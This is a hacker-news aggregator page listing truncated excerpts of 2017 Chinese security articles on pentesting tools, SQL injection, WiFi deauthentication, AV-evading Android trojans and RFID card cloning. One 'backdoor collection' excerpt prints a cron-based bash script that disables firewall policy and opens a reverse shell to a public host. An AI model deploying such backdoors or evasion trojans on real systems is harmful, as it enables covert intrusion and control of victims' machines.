记录黑客技术中优秀的内容, 传播黑客文化,分享黑客技术精华

Raven:一款可帮助渗透测试人员收集目标Linkedin信息的工具

Raven是一款专门针对Linkedin的信息收集工具,如果一个组织内的员工使用了Linkedin的话,那么渗透测试人员可以用它来收集有关这个组织的内部信息了。 注:请不要将该工具用于恶意目的,Raven的作者以及FB不对他人的任何活动负责。 工具安装 1.      以root权限运行setup.sh 2.      在raven.py中调整Linkedin凭证或将数据以参数的形式传递发送 3.      如果你使用的是Kali Linux,为了避免出现异常,请将Firefox更新至最新版 文档 该工具的使用非常的简单,它需要至
发布时间:2017-09-04 19:02 | 阅读:95189 | 评论:0 | 标签:专栏 LinkedIn Raven 信息收集

常见SQL注入方法整理系列-初始篇

前面介绍了MSSQL、MYSQL以及ORACLE的一些涉及安全体系的基本知识,且当作知识的积累或者温故吧。本篇主要介绍这三种数据库的攻击手法,力求形成一套攻击流程,当然流程是死的,在真实的攻击环境中还是需要发挥聪明才智的,所以也且当作参考笔记吧。 1  发现SQL注入漏洞 万事开头难,SQL注入攻击同样如此。给定一个WEB站点URL,发现该站点SQL注入漏洞最快的方法莫过于使用扫描工具,最有效的我自认为是查看应用程序源代码。然而工具往往不是万能的,查看源代码寻找注入漏洞的机会通常也是没有的,所以此时手工探测注入漏洞就显得格外重要了。 2  经典方法 相信听说过SQL注入攻击的,都知道最经典的探测方法。这里假设存在一个GET请求的连接http://www.sqltest.com/sql.php?id=1,则经典的
发布时间:2017-08-31 13:25 | 阅读:184775 | 评论:0 | 标签:专栏 SQL注入 信息安全 信息安全工程师 小白 渗透测试 注入

针对J2EE的重定向后代码执行

关于EAR 几年之前关于一种“新类型”的漏洞——重定向后代码执行的白皮书,被发布在http://cs.ucsb.edu/~bboe/public/pubs/fear-the-ear-ccs2011.pdf.这是一种“逻辑“型漏洞,关于EAR的原理也很简单。就是当一个web应用返回重定向头给用户时,没有停止而是继续执行之后的代码。因此,有可能绕过授权并且在web 应用中执行一些动作或者窃取一些重要信息。 下面的例子更清晰的解释了EAR:                 if (!(request.getParameter(“pass”).equals(adminPswd))) {                            response.sendRedirect(“
发布时间:2017-08-25 22:05 | 阅读:95780 | 评论:0 | 标签:专栏 java 任意代码执行漏洞

DockerScan:Docker安全分析&测试工具

今天给大家介绍的是一款名叫DockerScan的工具,我们可以用它来对Docker进行安全分析或者安全测试。 项目主页 http://github.com/cr0hn/dockerscan 提交问题 https://github.com/cr0hn/dockerscan/issues/ 开发者 Daniel Garcia (cr0hn) / Roberto Munoz (robskye) 使用文档 http://dockerscan.readthedocs.org 最新版本 1.0.0-Alpha-02 Python版本 3.5及以上版本 工具快速安装 > python3.5 -m pip instal
发布时间:2017-08-23 02:20 | 阅读:74700 | 评论:0 | 标签:专栏 DockerScan

#内容过于基础#Office远程代码执行漏洞(CVE-2017-8570)

                        Office远程代码执行漏洞(CVE-2017-8570) 接下来我将使用漏洞去远程控制电脑。 漏洞介绍 OfficeCVE-2017-85702017年7月,微软在例行的阅读补丁中修复了多个Microsoft Office漏洞,其中的CVE-2017-8570漏洞为一个逻辑漏洞,利用方法简单。网上公布了利用代码影响范围广泛。该漏洞为Microsoft Office的一个远程代码执行漏洞。 其成因是Microsof PowerPoint执行时会初始化“script”Moniker对象,而在PowerPoint播放动画期间会激活该对象,从而执行sc
发布时间:2017-08-23 02:20 | 阅读:98914 | 评论:0 | 标签:专栏 Office远程代码执行漏洞(CVE-2017-8570) 漏洞

MicroPython实现wifi干扰与抓包

  0×00前言   之前做的WIFI攻击实验都是基于arduino环境开发的,最近想尝试一下使用micropython完成deautch(解除认证)攻击。本次开发板使用的还是TPYBoardv202。   0×01实现原理   a) 通过查阅资料和arduino的源码分析,了解到实现攻击其实就是发送IEEE802.11协议解除认证包,根据MAC层帧格式发送自定义的虚假deautch数据包。   b) 调用ESP8266SDK中wifi_send_pkt_freedom函数,发送攻击包。   0×02攻击构思   a) 程序一开始扫描附件的AP。   b) 找到信号最强的AP,获取到他的MAC地址(bssid)和信道。   c) 将TPYBoardv202切换到同攻击AP相同的信
发布时间:2017-08-11 02:10 | 阅读:123850 | 评论:0 | 标签:专栏 wifi干扰 分析,抓包

教你通过Node.js漏洞完成渗透测试

PentestingNode.js Application : Nodejs Application Security 原文地址:http://www.websecgeeks.com/2017/04/pentesting-nodejs-application-nodejs.html 由prison翻译整理,首发i春秋。 引言: 由于原文地址在墙外,所以做下简介:本篇文章较为详细的讲述了通过node.js的已知漏洞来完成渗透测试的过程,介绍了node.js存在的漏洞可以在多种工具下的不同利用方式。因为我认为会对论坛部分web安全新手有所帮助,所以整理到论坛中。难度系数:三颗星。 关于Node.js的介绍我们这里就不再赘述。 今天我们主要讲下Node.js的一些可以对渗透测试工作有一些帮助的漏洞。为了更好地让大家
发布时间:2017-08-09 16:20 | 阅读:141539 | 评论:0 | 标签:专栏 漏洞分析 漏洞

企业数据分析,搞定这3个重点事半功倍!

近年来,人们对信息的关注已不仅限于数据本身,而是通过一系列统计工具及分析手段去挖掘其背后隐藏的价值,从而带来诸如减人增效、辅助决策的效果。 传统的电子电气制造业是典型的人口密集型生产行业,企业转型离不开自动化和信息化,而其中物流、信息流、资金流的整合是必不可少的过程,这就需要通过制定有效的管理手段并辅以强大的数据分析工具来实现。 很多人不明白自己企业当前阶段需要什么程度的数据分析工作,这就会导致数据分析平台搭建出来后,没人用、不好用、没价值的尴尬情况,明明花费了很多人力物力,但最后效果却不尽如人意,基层业务部门反馈不好用,领导也不关注,项目烂尾甚至失败都是可能的。 是否认识到这些误区? 误区一:以多取胜。有些企业在建设数据分析平台时,从业务部门获取到大量的分析指标,开发出成百上千张分析报表,并没有从实际使用
发布时间:2017-08-09 16:20 | 阅读:86858 | 评论:0 | 标签:专栏 大数据 数据分析

IOS渗透测试第一步-基础知识统一放送

原文: http://www.websecgeeks.com/2017/04/ios-application-pentesting-part-3.html http://www.websecgeeks.com/2017/04/ios-application-pentesting-part-4.html http://www.websecgeeks.com/2017/04/ios-application-pentesting-part-5.html 由prison翻译整理,首发i春秋 众所周知,应用程序由代码构成,其中有许多关于功能的信息,等等。如果我们能够提取出我们将要攻击的应用程序的所有可能的信息,那将是极好的。 我们将会看到如何提取iOS应用的类信息。 苹果在安全方面做了一些修改,现在大多数appsto
发布时间:2017-08-09 16:20 | 阅读:114787 | 评论:0 | 标签:专栏 移动端安全 iOS

连载黑客小说|《杀手》第六章 阴与阳 0与1 攻与防

夜深了,天气有些阴沉,有些发闷,让人感觉呼吸困难。路上还有几个刚刚下班的人往家里走,他们看上去有些疲惫,不时有几辆车呼啸而过。没过多久,狂风大作,电闪雷鸣,路边的树枝开始疯狂的摇头。很快无情的雨点从天空中落下,打在了正在赶路人的身上,人们纷纷拿着自己的包顶在头顶奔跑起来。这突如其来的一场大雨,拦住了深夜要赶回家的人,也惊醒了许多刚刚入睡的人们,还有那些害怕打雷无法入睡的人们。 风雨总是短暂的,下了一整夜的雨,清晨的空气变得清新起来,王梓伸了一个懒腰,然后拉开了窗帘,外面的阳光飞速的跑进屋内,填满整个卧室。打开窗,一股清爽的空气扑面而来,瞬间让人神清气爽。风雨过后总是会迎来美好,又或者给人们带来些许惊喜,比如雨后彩虹。 在这样一个美好的早晨,给人的心情也自然是不一样的,王梓准备下楼去公园转转。宅了许久,也应该出
发布时间:2017-08-09 16:20 | 阅读:69467 | 评论:0 | 标签:专栏 二进制 太极

[代码审计] Java代码审计连载之—添油加醋

本文作者:黑客小平哥,i春秋首发 前言 本篇文章原本是个PPT,但是一直放着没有分享,想着闲着也是闲着,那就改成文章发布吧。其实本篇重点在于两个知识点,一个是代码审计的逆向思维,另一个是二次攻击漏洞,其他的我都省略了,就写几个重要的吧。对于二次攻击我也是最近才研究的,研究了点皮毛,错误之处还请广大圈友指正,谢谢。 代码审计学习之旅 总有人问我代码审计该怎么学习,该从哪学习,现在统一回复,表示我也不知道。。。 但是对于个人的学习路线来说,路程是漫长而艰辛的,建议学习如下(直接截图了): 上面我写的是“熟悉”,这只是对刚入行的同学说的,作为代码审计来说,熟练编写代码程序是必须的,要想深度化发展,精通一门语言是必经之路。 知识一-变量逆向跟踪 在代码审计中,按业务流程审计当然是必须的,人工的流程审计的优点是能够
发布时间:2017-08-08 23:25 | 阅读:203159 | 评论:0 | 标签:专栏 代码审计

免杀之安卓渗透

引子: 前两天朋友找到一个免杀制作工具,需要配合msf自带的木马来使用的,朋友兴致高昂地告诉我,用这个工具可以做一个钓鱼网站,分分钟可以控制大量肉鸡;心想我不是个干坏事儿的人啊,但是这么好玩的事怎么能少了我呢,所以就只在内网测试了一下,结果这工具还真不错,360也没检测出来;这么好玩的事怎么能不分享一下呢,于是就有了下面的文章。(工具我就不抖出来了,免得造成不良后果,旨在分享精神)废话不多说,直接上文: 第一步:免杀木马 1.这款工具可直接制作(.exe/pdf/.apk/python)等文件类型,所以这覆盖面,你懂得!!! 2.为了文章的简短,这里只介绍apk的木马制作,所以在框框处填数字“21”,回车即可 3.接下来是设置安卓端需要下载木马的本地地址(192.168.131.102)及端口号(123),步
发布时间:2017-08-08 23:25 | 阅读:130262 | 评论:0 | 标签:专栏 网络安全 网络攻击 网络犯罪 网络钓鱼

一个钓鱼木马的分析(二)

            上次讲到此木马在内存里有个加密的pe文件存在,接下来我们就来讲解这个从内存里扣出来的pe文件到底怎么工作的。               在入口点,通过hash对比去查找ntdll.dll,kernel32.dll的模块句柄,而不是通过我们常用的方法GetMoudleHanlde()的方法去获取句柄,           看看serverlog_search_moudle这个函数的实现,在函数内部使用了[[[FS:[30]+0xc]+0xc]+0×30]的方法去获取模块的名字,在ring3层FS寄存器指向的是线程环境块,0×30的偏移即指向PEB(进程环境块),PEB的0xc就是指向LDR表,后面的偏移就是
发布时间:2017-08-06 03:40 | 阅读:72335 | 评论:0 | 标签:专栏 木马

一次对路边饮用水RFID供应机的跑路玩法

WARNING!!! 本文具有相当的攻击性以及复现性,仅供技术参考与教学用途研究,切勿用于非法用途,参考此文进行犯罪的相关人员与本人无关。 ——免责声明。参考刑法修正案:构成非法提供控制计算机信息系统的程序、工具罪,两罪量刑都是三年以下有期徒刑或者拘役,并处或者单处罚金,情节严重的,处三年以上七年以下有期徒刑,并处罚金。非法获取计算机信息系统数据罪 这次我们要用到的工具:ProxMark3        镇楼宝图在此:   No.2开始搞事。为了打发漫长而炎热的假期,回到了祖父家避暑,结果发现原本破败荒芜的家属大院内多了一台纯净水供应设备,而祖父也刚好办了一张卡,华山这几天温度热的要死,我竟然神奇的把黑色连到从北京坑到了华山美其名曰避暑然而,连续五天温度过了42度,无形装逼最为致命。现在家里面无聊到爆,于
发布时间:2017-08-04 17:50 | 阅读:107143 | 评论:0 | 标签:专栏 web安全

各类后门整理!【白帽黑客必备生存技能】

Unix Bash 远控后门 简介 利用 Unix/Linux 自带的 Bash 和 Crond 实现远控功能,保持反弹上线到公网机器。 利用方法 先创建 /etc/xxxx 脚本文件(名字自己改),利用该脚本进行反弹。以下脚本代表全自动反弹到 8.8.8.8 的 53 端口。 nano /etc/xxxx #!/bin/bash if netstat -ano|grep -v grep | grep "8.8.8.8">/dev/null then echo "OK">/dev/null else /sbin/iptables --policy INPUT ACCEPT /sbin/iptables --policy OUTPUT ACCEPT bash -i >& /dev/tcp
发布时间:2017-08-04 00:30 | 阅读:108479 | 评论:0 | 标签:专栏 mysql 后门

ASTo – 物联网(IoT)安全分析可视化工具

ASTo是一款新型物联网(IoT)安全分析可视化工具,它支持现有设备安全框架,并基于前端开发语言electron和可视化交互图形库cytoscape.js,其中涉及的图标由谷歌 Material Design设计。ASTo目前还处于调试阶段,后续还将添加和完善更多功能。 运行截图 运行特点 ASTo可以从网络抓包文档.pcapngcan中生成一些图片文件,这是我们目前进行中非常耗时的图形可视化分析实施的一部份,也只有程序实现菜单里包含网络抓包文档pcapng导入功能。该功能使用tcpdump工具以当前时间戳进行网络抓包,并存储为txt文件,之后基于这些txt文件生成图片js文件,分析完成后txt文件将被丢弃,而生成文件则被存储在graphs/implementation目录。 Tcpdump是Unix/Lin
发布时间:2017-08-04 00:30 | 阅读:91642 | 评论:0 | 标签:专栏 ASTo

公告

关注公众号hackdig,学习最新黑客技术

推广

工具

标签云

本页关键词